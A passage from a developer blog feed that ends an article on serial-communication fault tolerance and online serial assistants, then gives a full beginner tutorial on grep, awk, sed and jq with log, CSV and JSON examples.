&lt;p&gt;&lt;strong&gt;Operational Convenience&lt;/strong&gt;: Online serial assistants support importing batch command files (TXT/JSON format), setting command transmission intervals (e.g., 100ms per command), automatically sending commands, recording feedback results for each command, and generating execution reports.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.3 Fault Tolerance Mechanisms: Addressing Communication Anomalies
&lt;/h3&gt;

&lt;p&gt;Serial communication may experience anomalies due to interference or disconnection. Fault tolerance mechanisms need to be added to the protocol:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Retransmission Mechanism&lt;/strong&gt;: If the master does not receive a response within the timeout period (e.g., 100ms) after sending a command, it automatically retransmits the command (retransmission times can be set, e.g., 3 times) to avoid communication failure caused by single interference.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Data Backup&lt;/strong&gt;: Before executing a command, the receiver backs up critical data (e.g., device parameters). If command execution fails (e.g., checksum error), it restores the backup data to prevent abnormal device status.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Heartbeat Packets&lt;/strong&gt;: The master and device send heartbeat packets (e.g., “0xAA 0x01 0x00 0xAA”) at regular intervals (e.g., 1 second). If the master does not receive a heartbeat packet for 3 consecutive times, it determines the device is offline and triggers an alarm mechanism.&lt;/li&gt;
&lt;/ul&gt;
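&lt;p&gt;The heartbeat rule (three consecutive missed packets → offline) can be sketched as a small monitor. The 1-second interval and threshold of 3 are the example values from the list; timestamps are passed in explicitly to keep the logic testable:&lt;/p&gt;

```javascript
// Sketch: declare a device offline once no heartbeat has arrived for
// missedLimit consecutive intervals (assumed example values: 1 s, 3).
function makeHeartbeatMonitor(intervalMs = 1000, missedLimit = 3) {
  let lastSeen = null;
  return {
    onHeartbeat(now) { lastSeen = now; },
    isOffline(now) {
      if (lastSeen === null) return false; // never connected yet
      return now - lastSeen > intervalMs * missedLimit;
    },
  };
}

const mon = makeHeartbeatMonitor(1000, 3);
mon.onHeartbeat(0);
console.log(mon.isOffline(2500)); // false: within three intervals
console.log(mon.isOffline(3500)); // true: >3 s silent, trigger the alarm
```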

&lt;p&gt;&lt;strong&gt;Debugging Assistance&lt;/strong&gt;: The “communication fault tolerance test” function of online serial assistants can simulate abnormal scenarios such as data loss, interference, and disconnection, test the device’s fault tolerance, and record communication data when anomalies occur to help optimize the protocol’s fault tolerance logic.&lt;/p&gt;

&lt;h2&gt;
  
  
  VII. Conclusion: Technological Evolution of Serial Communication and Tool Empowerment
&lt;/h2&gt;

&lt;p&gt;Serial communication has evolved from the original RS232 protocol (suitable for short-distance, single-device communication) to the RS485 protocol (suitable for long-distance, multi-device communication), and further to integration with networks and the cloud. It remains a core communication method in embedded systems and IoT. Its technical core lies in “reasonable protocol design” and “efficient data processing,” while tools add value by lowering technical barriers and improving debugging efficiency.&lt;/p&gt;

&lt;p&gt;As a web-based tool, online serial assistants not only solve the pain points of traditional tools (e.g., “installation dependencies,” “limited functionality”) but also adapt to full-scenario needs from basic debugging to advanced applications through plugin systems, data visualization, and network bridging:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;For Novice Engineers&lt;/strong&gt;: No in-depth mastery of low-level code is required—serial connection, data parsing, and chart analysis can be completed via a visual interface.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;For Senior Engineers&lt;/strong&gt;: Custom plugins and protocol optimization are supported, enabling rapid verification of complex communication logic and fault tolerance mechanisms.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;For Team Collaboration&lt;/strong&gt;: Data files, plugins, and debugging reports can be shared online, reducing debugging costs across devices and environments.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In the future, with the development of IoT technology, serial communication will be further integrated with edge computing and AI analysis (e.g., real-time analysis of abnormal patterns in serial data via AI algorithms). Online serial assistants will also continue to iterate, adapting to more complex scenarios and providing more efficient technical support for engineers.&lt;/p&gt;

&lt;p&gt;If you encounter specific problems in serial communication practice or need to optimize protocol design, feel free to share your scenarios in the comment section—we can discuss solutions together. You can also use the “technical community” function of online serial assistants to exchange experiences with other engineers and jointly promote the application and innovation of serial communication technology.&lt;/p&gt;

</description>
      <category>uart</category>
      <category>serial</category>
    </item>
    <item>
      <title>Linux Text Processing: Master grep, awk, sed &amp; jq for Developers</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Thu, 30 Oct 2025 06:49:31 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/linux-text-processing-master-grep-awk-sed-jq-for-developers-3og7</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/linux-text-processing-master-grep-awk-sed-jq-for-developers-3og7</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;Learn how to use grep, awk, sed, and jq for efficient Linux text processing. This practical guide covers syntax, real-world examples, and best practices for sysadmins, developers, and data engineers.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/modern-edr-countermeasures-fundamentals-and-practical-guide-to-user-mode-function-hooking.html" rel="noopener noreferrer"&gt;Linux Text Processing: Master grep, awk, sed &amp;amp; jq for Developers&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;If you’ve spent any time working in Linux, you know text processing is non-negotiable. Whether you’re parsing gigabytes of server logs, extracting insights from CSV files, automating config edits, or wrangling JSON from APIs—you need tools that work fast and flexibly.&lt;/p&gt;

&lt;p&gt;The good news? Linux comes with four built-in powerhouses: &lt;code&gt;grep&lt;/code&gt;, &lt;code&gt;awk&lt;/code&gt;, &lt;code&gt;sed&lt;/code&gt;, and &lt;code&gt;jq&lt;/code&gt;. Each has a unique superpower, but together they handle 90% of text-related tasks. In this guide, we’re skipping the dry theory and focusing on &lt;em&gt;what you can actually use today&lt;/em&gt;. Let’s dive in.&lt;/p&gt;

&lt;h2&gt;
  
  
  Introduction to Linux Text Processing Tools
&lt;/h2&gt;

&lt;p&gt;Text processing in Linux boils down to four core tasks: searching, extracting, editing, and parsing structured data. These tools are lightweight, pre-installed on most distributions, and designed for command-line efficiency. Here’s a quick breakdown of their roles:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;grep&lt;/code&gt;: The “search master” for finding patterns in text&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;awk&lt;/code&gt;: The “data wizard” for extracting and calculating from structured text&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;sed&lt;/code&gt;: The “stream editor” for batch text modifications&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;jq&lt;/code&gt;: The “JSON hero” for filtering and transforming JSON data&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  1. grep: Find Text Like a Pro
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;grep&lt;/code&gt; (short for Global Regular Expression Print) is your first stop for locating lines that match a pattern. It’s lightning-fast, even on large files, and supports regular expressions for granular searches.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  Works with basic and extended regular expressions&lt;/li&gt;
&lt;li&gt;  Searches recursively through directories&lt;/li&gt;
&lt;li&gt;  Offers case-insensitive, line numbering, and inverse match options&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Practical Examples
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Basic Search&lt;/strong&gt;: Find all “ERROR” entries in a log file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;grep "ERROR" server.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Case-Insensitive + Line Numbers&lt;/strong&gt;: Catch “error” or “Error” with line numbers:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;grep -i -n "error" server.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Recursive Search&lt;/strong&gt;: Find “TODO” comments in all Python files:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;grep -r "TODO" *.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Invert Match&lt;/strong&gt;: Show lines that &lt;em&gt;don’t&lt;/em&gt; contain “DEBUG” (great for filtering noise):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;grep -v "DEBUG" server.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  2. awk: Extract &amp;amp; Analyze Structured Data
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;awk&lt;/code&gt; isn’t just a tool—it’s a mini-programming language for text. It excels at processing line-by-line structured data (like CSVs or logs with fixed fields) by splitting lines into columns and applying logic.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  Splits lines into customizable fields (default: whitespace)&lt;/li&gt;
&lt;li&gt;  Supports conditionals, loops, and arithmetic&lt;/li&gt;
&lt;li&gt;  Uses &lt;code&gt;BEGIN&lt;/code&gt;/&lt;code&gt;END&lt;/code&gt; blocks for setup/teardown tasks&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Practical Examples
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Extract CSV Fields&lt;/strong&gt;: Print names and cities from &lt;code&gt;users.csv&lt;/code&gt; (columns: name,age,city):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;awk -F',' '{print $1", "$3}' users.csv
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Alice, New York
Bob, London
Charlie, Paris
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Conditional Filtering&lt;/strong&gt;: List users older than 30:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;awk -F',' '$2 &amp;gt; 30 {print $1}' users.csv
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Calculate Totals&lt;/strong&gt;: Sum all ages in the CSV:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;awk -F',' '{sum += $2} END {print sum}' users.csv
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  3. sed: Batch Edit Text Streams
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;sed&lt;/code&gt; (Stream Editor) is built for modifying text without opening files. It’s perfect for find-and-replace, deleting lines, or inserting content—especially in scripts.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  Performs in-place edits or outputs to the terminal&lt;/li&gt;
&lt;li&gt;  Uses regex for pattern matching&lt;/li&gt;
&lt;li&gt;  Non-interactive (ideal for automation)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Practical Examples
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Find-and-Replace&lt;/strong&gt;: Replace “ERROR” with “WARNING” in &lt;code&gt;server.log&lt;/code&gt; (preview first):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sed 's/ERROR/WARNING/g' server.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;In-Place Edit&lt;/strong&gt;: Modify the file directly (add &lt;code&gt;.bak&lt;/code&gt; to create a backup: &lt;code&gt;-i.bak&lt;/code&gt;):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sed -i 's/ERROR/WARNING/g' server.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Delete Lines&lt;/strong&gt;: Remove all lines containing “DEBUG”:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sed '/DEBUG/d' server.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  4. jq: Tame JSON Data
&lt;/h2&gt;

&lt;p&gt;With APIs and JSON configs everywhere, &lt;code&gt;jq&lt;/code&gt; is a must-have for parsing JSON in the command line. It turns messy JSON into readable output and lets you filter/transform data with simple syntax.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  Queries nested JSON objects/arrays&lt;/li&gt;
&lt;li&gt;  Supports filtering, mapping, and aggregation&lt;/li&gt;
&lt;li&gt;  Formats output for readability&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Practical Examples
&lt;/h3&gt;

&lt;p&gt;Given &lt;code&gt;data.json&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[
  {"name": "Alice", "age": 25, "city": "New York"},
  {"name": "Bob", "age": 30, "city": "London"},
  {"name": "Charlie", "age": 35, "city": "Paris"}
]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Extract Names&lt;/strong&gt;: Get all names from the JSON array:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;jq '.[].name' data.json
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Filter by Age&lt;/strong&gt;: Find users older than 30:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;jq '.[] | select(.age &amp;gt; 30) | .name' data.json
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Combining Tools: Real-World Pipelines
&lt;/h2&gt;

&lt;p&gt;The real magic happens when you chain these tools with Linux pipes (&lt;code&gt;|&lt;/code&gt;). Here are two common workflows:&lt;/p&gt;

&lt;h3&gt;
  
  
  Example 1: Analyze Web Server Logs
&lt;/h3&gt;

&lt;p&gt;Extract IPs and URLs from 404 errors in &lt;code&gt;access.log&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;grep "404" access.log | awk '{print $1, $7}'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Example 2: Transform JSON Logs
&lt;/h3&gt;

&lt;p&gt;Filter &lt;code&gt;/api&lt;/code&gt; endpoints and replace status “200” with “OK” in &lt;code&gt;api.log&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;jq '.[] | select(.endpoint | startswith("/api"))' api.log | sed 's/"status": 200/"status":"OK"/g'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Pro Tips for Mastery
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Test Regex Incrementally&lt;/strong&gt;: Complex patterns break easily—test parts first with &lt;code&gt;grep -E&lt;/code&gt; (extended regex).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Backup Before Editing&lt;/strong&gt;: Always use &lt;code&gt;sed -i.bak&lt;/code&gt; to create backups, or test commands without &lt;code&gt;-i&lt;/code&gt; first.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Learn Common Flags&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;grep&lt;/code&gt;: &lt;code&gt;-i&lt;/code&gt; (case-insensitive), &lt;code&gt;-r&lt;/code&gt; (recursive)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;awk&lt;/code&gt;: &lt;code&gt;-F&lt;/code&gt; (field separator), &lt;code&gt;END&lt;/code&gt; (final action)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sed&lt;/code&gt;: &lt;code&gt;s/pattern/replace/g&lt;/code&gt; (global replace)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;jq&lt;/code&gt;: &lt;code&gt;.[]&lt;/code&gt; (iterate arrays), &lt;code&gt;select()&lt;/code&gt; (filter)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Use &lt;code&gt;man&lt;/code&gt; Pages&lt;/strong&gt;: &lt;code&gt;man grep&lt;/code&gt; or &lt;code&gt;man jq&lt;/code&gt; offers in-depth docs for edge cases.&lt;/p&gt;

&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;grep, awk, sed, and jq aren’t just “tools”—they’re time-savers that turn tedious text tasks into one-liners. The more you experiment with them (start small: parse a log, edit a CSV), the more they’ll become second nature.&lt;/p&gt;

&lt;p&gt;What’s your go-to text processing workflow? Drop a comment below—we’d love to hear how you use these tools in your projects!&lt;/p&gt;

</description>
      <category>linux</category>
    </item>
  </channel>
</rss>
